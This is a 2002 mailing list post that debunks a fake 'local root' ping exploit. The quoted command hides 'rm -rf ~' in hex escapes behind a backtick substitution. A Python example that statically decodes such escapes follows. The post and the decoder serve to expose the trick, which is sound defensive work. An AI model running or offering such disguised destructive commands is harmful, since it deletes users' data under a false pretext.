Full Disclosure mailing list archives

ATTENTION Local Root ATTENTION


From: gbroiles () parrhesia com (Greg Broiles)
Date: Sun, 15 Sep 2002 06:56:44 -0700

At 06:40 AM 9/15/2002 -0700, drdre () hush com wrote:

DrDre researchers have recently discovered a bug in the ping program which 
is installed setuid-root in nearly all unix and unix like systems. The bug 
is not remotely exploitable.

Tested on FreeBSD 4.4:

bash# id
uid=1006(drdre) gid=1006(researchers) groups=1006(researchers), 1009(labstaff)

bash# ping `perl -e 'print 
"\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo 
 -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
Unknown erver error   ^

Ahh, bullshit.

echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e" decodes to "rm -rf ~".

The bug you illustrate is related to people who run obscured code from 
untrusted sources without inspecting it first.


--
Greg Broiles -- gbroiles () parrhesia com -- PGP 0x26E4488c or 0x94245961
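
The inspection the reply above calls for, as an added example that is not part of the original post: a static decoder that expands literal \xNN escapes inside each command substitution of a pasted shell line and reports whether the substitution's output would itself be run as a command. Nothing is executed; the function and field names are this example's own, and SAMPLE is the command quoted in the message.

```python
import re

# One \xNN escape as it appears literally in pasted text.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Backtick and $( ... ) substitutions (non-nested; enough for triage).
SUBSTITUTION = re.compile(r'`([^`]*)`|\$\(([^()]*)\)')
# Perl-style repeat count after a string literal, e.g. "..."x1024
REPEAT = re.compile(r'''["']\s*x\s*(\d+)''')

# The command from the quoted message, held as inert text.
SAMPLE = (
    r"""ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;"""
    r"""`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`"""
)

def decode_escapes(text):
    # Replace each literal \xNN with the character it encodes.
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def inspect_command(command):
    # Return one finding per command substitution found in the line.
    findings = []
    for m in SUBSTITUTION.finditer(command):
        inner = m.group(1) if m.group(1) is not None else m.group(2)
        literals = re.findall(r'"([^"]*)"', inner)
        repeat = REPEAT.search(inner)
        before = command[:m.start()].rstrip()
        findings.append({
            "substitution": inner,
            # Decoded form of every quoted string that hides hex escapes.
            "decoded": [decode_escapes(s) for s in literals
                        if HEX_ESCAPE.search(s)],
            # Padding count, if the string is repeated to look like an overflow.
            "repeat": int(repeat.group(1)) if repeat else None,
            # True when the substitution starts a command of its own, so the
            # shell runs whatever text the substitution prints.
            "command_position": before == "" or before[-1] in ";&|",
        })
    return findings

if __name__ == "__main__":
    for finding in inspect_command(SAMPLE):
        print(finding["command_position"], finding["repeat"], finding["decoded"])
```

The first substitution is only padding passed to ping as an argument; the second sits after the `;` in command position, so its decoded text is what the shell would actually run.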



